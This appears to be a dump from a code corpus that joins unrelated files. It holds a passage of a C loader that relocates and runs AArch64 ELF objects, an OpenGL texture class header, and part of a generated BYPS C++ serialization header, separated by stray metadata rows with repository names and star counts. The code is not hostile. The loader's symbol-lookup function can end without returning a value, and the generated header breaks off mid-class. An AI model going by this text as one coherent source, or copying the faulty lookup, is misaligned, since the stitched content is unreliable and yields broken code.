#define SHT_FINI_ARRAY 15
#define SHT_PREINIT_ARRAY 16
#define SHT_GROUP 17
#define SHT_SYMTAB_SHNDX 18
#define SHT_LOOS 0x60000000
#define SHT_HIOS 0x6fffffff
#define SHT_LOPROC 0x70000000
#define SHT_HIPROC 0x7FFFFFFF
#define SHT_LOUSER 0x80000000
#define SHT_HIUSER 0xFFFFFFFF
#define STN_UNDEF 0
#define STB_LOCAL 0
#define STB_GLOBAL 1
#define STB_WEAK 2
#define STB_LOOS 10
#define STB_GNU_UNIQUE 10
#define STB_HIOS 12
#define STB_LOPROC 13
#define STB_HIPROC 15
#define STT_NOTYPE 0
#define STT_OBJECT 1
#define STT_FUNC 2
#define STT_SECTION 3
#define STT_FILE 4
#define STT_COMMON 5
#define STT_TLS 6
#define STT_RELC 8
#define STT_SRELC 9
#define STT_LOOS 10
#define STT_GNU_IFUNC 10
#define STT_HIOS 12
#define STT_LOPROC 13
#define STT_HIPROC 15
#define GET_QI(x) *(unsigned char *)&(x)
#define GET_HI(x) *(unsigned short *)&(x)
#define GET_SI(x) *(unsigned int *)&(x)
#define GET_DI(x) *(unsigned long long *)&(x)
#define SET_QI(x, y) *(unsigned char *)&(x) = y;
#define SET_HI(x, y) *(unsigned short *)&(x) = y;
#define SET_SI(x, y) *(unsigned int *)&(x) = y;
#define SET_DI(x, y) *(unsigned long long *)&(x) = y;
#define EI_NIDENT 16
#define FREAD_CHECK(BUF, SIZE, NUM, STREAM) \
do \
{ \
ret = fread(BUF, SIZE, NUM, STREAM); \
if (ret != NUM) \
return -EIO; \
} \
while (0)
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* ELF "magic number" */
unsigned char e_type[2]; /* Identifies object file type */
unsigned char e_machine[2]; /* Specifies required architecture */
unsigned char e_version[4]; /* Identifies object file version */
unsigned char e_entry[8]; /* Entry point virtual address */
unsigned char e_phoff[8]; /* Program header table file offset */
unsigned char e_shoff[8]; /* Section header table file offset */
unsigned char e_flags[4]; /* Processor-specific flags */
unsigned char e_ehsize[2]; /* ELF header size in bytes */
unsigned char e_phentsize[2]; /* Program header table entry size */
unsigned char e_phnum[2]; /* Program header table entry count */
unsigned char e_shentsize[2]; /* Section header table entry size */
unsigned char e_shnum[2]; /* Section header table entry count */
unsigned char e_shstrndx[2]; /* Section header string table index */
} Elf64Hdr;
typedef struct
{
unsigned char sh_name[4];
unsigned char sh_type[4];
unsigned char sh_flags[8];
unsigned char sh_addr[8];
unsigned char sh_offset[8];
unsigned char sh_size[8];
unsigned char sh_link[4];
unsigned char sh_info[4];
unsigned char sh_addralign[8];
unsigned char sh_entsize[8];
} Elf64Shdr;
typedef struct {
unsigned char r_offset[8];
unsigned char r_info[8];
unsigned char r_addend[8];
} Elf64Rela;
#define ELF64_R_SYM(i) ((i) >> 32)
#define ELF64_R_TYPE(i) ((i) & 0xffffffff)
#define ELF64_R_INFO(s,t) (((uint64_t) (s) << 31 << 1) + (uint64_t) (t))
typedef struct {
unsigned char st_name[4];
unsigned char st_info[1];
unsigned char st_other[1];
unsigned char st_shndx[2];
unsigned char st_value[8];
unsigned char st_size[8];
} Elf64Sym;
#define ELF64_ST_BIND(info) (((uint32_t)(info)) >> 4)
#define ELF64_ST_TYPE(info) ((info) & 0xf)
#define ELF64_ST_INFO(bind, type) (((bind) << 4) + ((type) & 0xf))
#define PG(x) ((x) & ~(uint64_t)0xfff)
#define PG_OFFSET(x) ((x) & (uint64_t)0xfff)
#define MASK(n) ((1u << (n)) - 1)
static void MCC_CleanupLocalStackRef_NaiveRCFast()
{
}
static void MCC_DecRef_NaiveRCFast()
{
}
static void MCC_GetOrInsertLiteral()
{
}
static void MCC_IncRef_NaiveRCFast()
{
}
static void **sec_addr;
static void relocate_sec(Elf64Rela *rel, int num, void *sec, Elf64Sym *symtab,
char *strtab)
{
for (int idx = 0; idx < num; idx++) {
int64_t addend = (int64_t)(GET_DI(rel[idx].r_addend));
int symidx = ELF64_R_SYM(GET_DI(rel[idx].r_info));
int64_t rel_off = GET_DI(rel[idx].r_offset);
Elf64Sym *sym = symtab + symidx;
int symtype = ELF64_ST_TYPE(GET_QI(sym->st_info));
int reltype = ELF64_R_TYPE(GET_DI(rel[idx].r_info));
bool is_64bit_reloc = false, nop_call = false;
uint32_t cand_4byte;
uint64_t cand_8byte;
int64_t relval = 0;
if (symtype == STT_SECTION) {
relval = (uint64_t)sec_addr[GET_HI(sym->st_shndx)];
} else {
const char *symname = strtab + GET_SI(sym->st_name);
if (!strcmp(symname, "puts")) {
relval = (uint64_t)puts;
} else if (!strcmp(symname, "MCC_IncRef_NaiveRCFast")) {
relval = (uint64_t)MCC_IncRef_NaiveRCFast;
nop_call = true;
} else if (!strcmp(symname, "MCC_DecRef_NaiveRCFast")) {
relval = (uint64_t)MCC_DecRef_NaiveRCFast;
nop_call = true;
} else if (!strcmp(symname, "MCC_CleanupLocalStackRef_NaiveRCFast")) {
relval = (uint64_t)MCC_CleanupLocalStackRef_NaiveRCFast;
nop_call = true;
} else if (!strcmp(symname, "MCC_GetOrInsertLiteral")) {
relval = (uint64_t)MCC_GetOrInsertLiteral;
nop_call = true;
}
}
relval += addend;
cand_4byte = *(uint32_t *)(sec + rel_off);
cand_8byte = *(uint64_t *)(sec + rel_off);
switch (reltype) {
case R_AARCH64_ADR_PREL_PG_HI21:
relval = PG(relval) - PG((int64_t)sec);
relval >>= 12;
cand_4byte = (cand_4byte & ~((MASK (2) << 29) | (MASK (19) << 5)))
| ((relval & MASK (2)) << 29)
| ((relval & (MASK (19) << 2)) << 3);
break;
case R_AARCH64_ADD_ABS_LO12_NC:
relval = PG_OFFSET(relval);
cand_4byte = ((cand_4byte & ~(MASK (12) << 10))
| ((relval & MASK (12)) << 10));
break;
case R_AARCH64_LDST64_ABS_LO12_NC:
relval = PG_OFFSET(relval);
relval >>= 3;
cand_4byte = ((cand_4byte & ~(MASK (12) << 10))
| ((relval & MASK (12)) << 10));
break;
case R_AARCH64_CALL26:
if (nop_call) {
/* mov x0, x0. */
cand_4byte = 0xaa0003e0;
break;
}
relval = relval - ((int64_t)sec + rel_off);
relval >>= 2;
cand_4byte &= ~MASK(26);
cand_4byte |= relval & MASK(26);
break;
case R_AARCH64_PREL32:
relval = relval - ((int64_t)sec + rel_off);
cand_4byte = relval;
break;
case R_AARCH64_PREL64:
relval = relval - ((int64_t)sec + rel_off);
cand_8byte = relval;
is_64bit_reloc = true;
break;
case R_AARCH64_ABS32:
cand_4byte = relval;
break;
case R_AARCH64_ABS64:
cand_8byte = relval;
is_64bit_reloc = true;
break;
default:
printf("Unsupported relocation type: %s\n", reloc_name[reltype]);
continue;
}
if (is_64bit_reloc)
*(uint64_t *)(sec + rel_off) = cand_8byte;
else
*(uint32_t *)(sec + rel_off) = cand_4byte;
}
}
static void *get_addr_from_sym(const char *sym_name, Elf64Shdr *shdr,
int e_shnum)
{
const Elf64Sym *symtab;
const char *strtab;
int i, j, cnt;
for (i = 0; i < e_shnum; i++) {
uint32_t sec_type = GET_SI(shdr[i].sh_type);
if (sec_type != SHT_SYMTAB)
continue;
symtab = sec_addr[i];
cnt = GET_DI(shdr[i].sh_size) / GET_DI(shdr[i].sh_entsize);
strtab = sec_addr[GET_SI(shdr[i].sh_link)];
for (j = 0; j < cnt; j++) {
const Elf64Sym *sym = symtab + j;
if (strcmp(strtab + GET_SI(sym->st_name), sym_name))
continue;
return sec_addr[GET_HI(sym->st_shndx)] + GET_DI(sym->st_value);
}
}
}
/* ARC has internal string representation. */
static int local_java_sys_printf(void *object, void *str)
{
int len = *(unsigned char *)(str + 8 + 4);
char *buf;
len = (len - 1) / 2;
buf = calloc(1, len);
if (!buf)
return -ENOMEM;
strncpy(buf, str + 20, len);
printf("%s", buf);
free(buf);
fflush(stdout);
return 0;
}
static int special_section_hack(Elf64Shdr *shdr, int e_shnum)
{
void **data_addr = get_addr_from_sym("_PTR__cinf_Ljava_2Flang_2FSystem_3B",
shdr, e_shnum);
void *fake_data = malloc(64);
if (!fake_data)
return -ENOMEM;
*data_addr = fake_data;
*(void **)(fake_data + 48) = fake_data + 56;
data_addr = get_addr_from_sym("_PTRLjava_2Flang_2FSystem_3B_7Cout",
shdr, e_shnum);
/* Alloc independent fake data. */
fake_data = malloc(256);
if (!fake_data)
return -ENOMEM;
*data_addr = fake_data;
*(void **)(fake_data + 0) = fake_data + 56;
*(void **)(fake_data + 56) = fake_data + 64;
void *fake_data2 = malloc(512);
if (!fake_data2)
return -ENOMEM;
*(void **)(fake_data + 64 + 24) = fake_data2;
*(void **)(fake_data2 + 312) = local_java_sys_printf;
return 0;
}
int main(int argc, char *argv[]) {
uint16_t e_shentsize, e_shnum, e_shstrndx;
uint64_t sec_size, e_shoff, dummy_val;
int verbose_level, ret, idx;
Elf64Shdr *shdr, *str_shdr;
unsigned char *shstrtab;
Elf64Hdr elf_hdr;
FILE *fp;
if (argc != 4) {
fprintf(stderr, "Usage: pacific arc_obj entry_sec verbose_level\n");
fprintf(stderr, " entry_sec: ELF section index or entry function symbol\n");
fprintf(stderr, " verbose_level: bigger for more verbose info, 0 for no verbose info\n");
return 1;
}
verbose_level = atoi(argv[3]);
init_reloc_name();
fp = fopen(argv[1], "r");
if (!fp)
return -EIO;
/* ELF header */
FREAD_CHECK(&elf_hdr, sizeof(elf_hdr), 1, fp);
/* Section headers. */
e_shoff = GET_DI(elf_hdr.e_shoff);
e_shentsize = GET_HI(elf_hdr.e_shentsize);
e_shnum = GET_HI(elf_hdr.e_shnum);
e_shstrndx = GET_HI(elf_hdr.e_shstrndx);
fseek(fp, e_shoff, SEEK_SET);
shdr = malloc(e_shnum * e_shentsize);
if (!shdr)
return -ENOMEM;
FREAD_CHECK(shdr, sizeof(*shdr), e_shnum, fp);
sec_addr = calloc(e_shnum, sizeof(void *));
if (!sec_addr)
return -ENOMEM;
/* Section header string table. */
str_shdr = shdr + e_shstrndx;
fseek(fp, GET_DI(str_shdr->sh_offset), SEEK_SET);
sec_size = GET_DI(str_shdr->sh_size);
shstrtab = malloc(sec_size);
if (!shstrtab)
return -ENOMEM;
/* String table. */
FREAD_CHECK(shstrtab, sec_size, 1, fp);
for (idx = 0; idx < e_shnum; idx++) {
uint32_t sec_type = GET_SI(shdr[idx].sh_type);
uint64_t sec_flag = GET_DI(shdr[idx].sh_flags);
if (!((sec_flag & SHF_ALLOC)
||sec_type == SHT_PROGBITS
|| sec_type == SHT_RELA
|| sec_type == SHT_SYMTAB
|| sec_type == SHT_STRTAB))
continue;;
sec_size = GET_DI(shdr[idx].sh_size);
/* Sec like .bss. */
if (sec_type == SHT_NOBITS) {
sec_addr[idx] = calloc(1, sec_size);
continue;
} else if (!sec_size) {
continue;
}
if (verbose_level)
printf("sec loading: %s\n", shstrtab + GET_SI(shdr[idx].sh_name));
fseek(fp, GET_DI(shdr[idx].sh_offset), SEEK_SET);
/* For executable section, remap it.
* TBD: mmap from FD directly, but may need to map some pages twice.
*/
if (sec_flag & SHF_EXECINSTR) {
sec_addr[idx] = mmap(NULL, sec_size, PROT_WRITE | PROT_EXEC,
MAP_ANON | MAP_PRIVATE, -1, 0);
if (sec_addr[idx] == (void *)-1)
return -errno;
} else {
sec_addr[idx] = malloc(sec_size);
if (!sec_addr[idx])
return -ENOMEM;
}
FREAD_CHECK(sec_addr[idx], sec_size, 1, fp);
}
for (idx = 0; idx < e_shnum; idx++) {
uint32_t sec_type = GET_SI(shdr[idx].sh_type);
uint32_t sh_link, sh_info;
if (sec_type != SHT_RELA)
continue;
sh_link = GET_SI(shdr[idx].sh_link);
sh_info = GET_SI(shdr[idx].sh_info);
if (verbose_level)
printf("sec relocating: %s\n", shstrtab + GET_SI(shdr[idx].sh_name));
relocate_sec(sec_addr[idx],
GET_DI(shdr[idx].sh_size) / GET_DI(shdr[idx].sh_entsize),
sec_addr[sh_info], sec_addr[sh_link],
sec_addr[GET_SI(shdr[sh_link].sh_link)]);
}
ret = special_section_hack(shdr, e_shnum);
if (ret < 0)
return ret;
/* Assume either section index or function symbol and utilize section 0 is
* NULL section which could not be entry section.
*/
int entry_sec_idx = atoi(argv[2]);
void (*func)();
if (!entry_sec_idx)
func = get_addr_from_sym(argv[2], shdr, e_shnum);
else
func = sec_addr[entry_sec_idx];
if (verbose_level)
printf("entry addr: 0x%p\n", func);
void *old_sp = NULL, *new_stack = malloc(1024 * 1024);
if (!new_stack)
return -ENOMEM;
/* ARK code-gen seems to be using x19 as a special register for
* "yieldpoint" check, fake it at the moment.
*
* Create independent stack for loaded program.
*/
__asm__("mov %0, sp\n"
"mov sp, %1\n"
"mov x19, %2"
:"=r"(old_sp)
:"r"(new_stack), "r"(&dummy_val)
:);
func();
/* Restore sp. */
__asm__("mov sp, %0"
:
:"r"(old_sp)
:);
fclose(fp);
return 0;
}
| 40.127174 | 102 | 0.758919 |
92e221ed03fdb2e1faf77b38ee927200b5bc8c0d | 1,767 | h | C | OpenGL/Texture Matrix/gl_texture.h | Allenjonesing/tutorials | c729fdd655130b021ec7ca9b619e147ae636cfa5 | [
"MIT"
] | 367 | 2015-01-12T22:43:04.000Z | 2022-03-31T02:03:27.000Z | OpenGL/Texture Matrix/gl_texture.h | uag515/tutorials | c729fdd655130b021ec7ca9b619e147ae636cfa5 | [
"MIT"
] | 3 | 2016-04-17T06:02:01.000Z | 2019-01-20T16:07:53.000Z | OpenGL/Texture Matrix/gl_texture.h | uag515/tutorials | c729fdd655130b021ec7ca9b619e147ae636cfa5 | [
"MIT"
] | 212 | 2015-01-14T14:13:34.000Z | 2022-03-04T01:08:41.000Z | #ifndef GL_TEXTURE_H
#define GL_TEXTURE_H
#define TEXTURE_NOT_LOADED -1 //
#define TEX_SCROLL_AMT 0.005f // Default amount to scroll a texture UVs by
#define TEX_SCALE_AMT 0.001f // Default amount to scale texture UVs by
#define TEX_ROTATION_AMT 0.25f // Default amount to increase/decrease texture's UVs angle of rotation
// OGL Texture class
class CGLTexture
{
public:
CGLTexture(); // Constructor
// Loads the texture specified by the file name
// Returns true on success, false otherwise
bool load(const char *fileName, bool buildMipMaps = false);
void select(); // Selects the texture as the current texture to use
enum EScrollDir
{
eLeft,
eRight,
eUp,
eDown,
eMaxDir
};
void scroll(EScrollDir dir, float amt = TEX_SCROLL_AMT); // Set the scrolling direction and
// the amount to scroll in that
// direction
// Set the scale amount of the texture
void setScale(float amt) { scale = amt; }
// Set the rotation angle of the texture's UVs
void setRotation(float rotAngle) { angle = rotAngle; }
void freeMem(); // Frees up the texture memory
~CGLTexture(); // Free up memory
private:
int id; // The texture id
float tx; // Amount to translate the UVs in the X direction
float ty; // Amount to translate the UVs in the Y direction
float scale; // Amount to scale the UVs by
float angle; // Amount to rotate the UVs by
// We make the copy constructor and assignment operator private because
// we do NOT want anyone accidentally making a copy of this class
// It should always be passed by pointer or reference
CGLTexture(const CGLTexture &obj) {}
CGLTexture& operator =(CGLTexture &obj) { return *this; }
};
#endif
| 28.047619 | 101 | 0.690436 |
fb083fabd3fdcd310522291b5ef5006a573acc81 | 316,966 | h | C | cpp/common/bypstest/bypstest-gen/impl/Testser-impl.h | markusessigde/byps | b8099a54079823a8fbb156e3e5a3a13fb576d031 | [
"MIT"
] | null | null | null | cpp/common/bypstest/bypstest-gen/impl/Testser-impl.h | markusessigde/byps | b8099a54079823a8fbb156e3e5a3a13fb576d031 | [
"MIT"
] | null | null | null | cpp/common/bypstest/bypstest-gen/impl/Testser-impl.h | markusessigde/byps | b8099a54079823a8fbb156e3e5a3a13fb576d031 | [
"MIT"
] | null | null | null | #ifndef __Testser_impl_H__
#define __Testser_impl_H__
#include "Byps-impl.h"
#include "Testser-api.h"
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1
// typeId=432867947
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1 : public BSerializable {
public: bool result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1(bool result = bool()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_10
// typeId=534004421
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_10 : public BSerializable {
public: ::std::wstring result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_10(::std::wstring result = ::std::wstring()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1000
// typeId=2077138821
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1000 : public BSerializable {
public: byps::test::api::prim::PPrimitiveTypes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1000(byps::test::api::prim::PPrimitiveTypes result = byps::test::api::prim::PPrimitiveTypes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_100361105
// typeId=498939805
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_100361105 : public BSerializable {
public: PArrayInt result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_100361105(PArrayInt result = PArrayInt()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1050216688
// typeId=70523627
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1050216688 : public BSerializable {
public: byps::PVectorLong result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1050216688(byps::PVectorLong result = byps::PVectorLong()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1059148284
// typeId=698727944
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1059148284 : public BSerializable {
public: byps::PVectorByte result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1059148284(byps::PVectorByte result = byps::PVectorByte()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1097129250
// typeId=200721390
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1097129250 : public BSerializable {
public: PArrayLong result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1097129250(PArrayLong result = PArrayLong()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1097919350
// typeId=428832038
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1097919350 : public BSerializable {
public: byps::PSetDate result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1097919350(byps::PSetDate result = byps::PSetDate()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1174971318
// typeId=1068483136
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1174971318 : public BSerializable {
public: byps_ptr< ::std::vector< PBytes > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1174971318(byps_ptr< ::std::vector< PBytes > > result = byps_ptr< ::std::vector< PBytes > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_12
// typeId=534004419
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_12 : public BSerializable {
public: byps::PVectorObject result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_12(byps::PVectorObject result = byps::PVectorObject()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1201775504
// typeId=1521577218
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1201775504 : public BSerializable {
public: PArray4Byte result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1201775504(PArray4Byte result = PArray4Byte()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1218831438
// typeId=911793767
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1218831438 : public BSerializable {
public: byps::PVectorInputStream result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1218831438(byps::PVectorInputStream result = byps::PVectorInputStream()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_124584219
// typeId=996163680
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_124584219 : public BSerializable {
public: byps::PArray4Object result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_124584219(byps::PArray4Object result = byps::PArray4Object()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1279823631
// typeId=629604454
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1279823631 : public BSerializable {
public: byps::PMapStringBoolean result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1279823631(byps::PMapStringBoolean result = byps::PMapStringBoolean()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1320560671
// typeId=2041057155
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1320560671 : public BSerializable {
public: byps::PSetDouble result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1320560671(byps::PSetDouble result = byps::PSetDouble()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1347703734
// typeId=881037921
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1347703734 : public BSerializable {
public: byps::PMapIntegerInteger result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1347703734(byps::PMapIntegerInteger result = byps::PMapIntegerInteger()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1358523233
// typeId=1693860029
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1358523233 : public BSerializable {
public: byps::test::api::inl::PMapIntegerPoint2D result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1358523233(byps::test::api::inl::PMapIntegerPoint2D result = byps::test::api::inl::PMapIntegerPoint2D()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1359468275
// typeId=1738389572
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1359468275 : public BSerializable {
public: PArrayDouble result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1359468275(PArrayDouble result = PArrayDouble()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1361632968
// typeId=1548641599
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1361632968 : public BSerializable {
public: PArrayChar result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1361632968(PArrayChar result = PArrayChar()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1365696060
// typeId=809340660
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1365696060 : public BSerializable {
public: byps::PSetBoolean result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1365696060(byps::PSetBoolean result = byps::PSetBoolean()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1366799209
// typeId=1725564610
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1366799209 : public BSerializable {
public: byps::PMapStringDate result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1366799209(byps::PMapStringDate result = byps::PMapStringDate()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1374008726
// typeId=1484626910
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1374008726 : public BSerializable {
public: PBytes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1374008726(PBytes result = PBytes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1375035164
// typeId=1920161159
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1375035164 : public BSerializable {
public: byps::test::api::enu::EnumPlanets result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1375035164(byps::test::api::enu::EnumPlanets result = byps::test::api::enu::EnumPlanets()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1391985860
// typeId=1722268526
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1391985860 : public BSerializable {
public: byps::test::api::ver::PEvolve result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1391985860(byps::test::api::ver::PEvolve result = byps::test::api::ver::PEvolve()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_14
// typeId=534004417
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_14 : public BSerializable {
public: byps_ptr< ::std::set< PSerializable > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_14(byps_ptr< ::std::set< PSerializable > > result = byps_ptr< ::std::set< PSerializable > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1406124761
// typeId=2127200796
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1406124761 : public BSerializable {
public: byps_ptr< ::std::set< PArrayInt > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1406124761(byps_ptr< ::std::set< PArrayInt > > result = byps_ptr< ::std::set< PArrayInt > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1406664368
// typeId=1980364794
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1406664368 : public BSerializable {
public: PArrayDate result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1406664368(PArrayDate result = PArrayDate()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
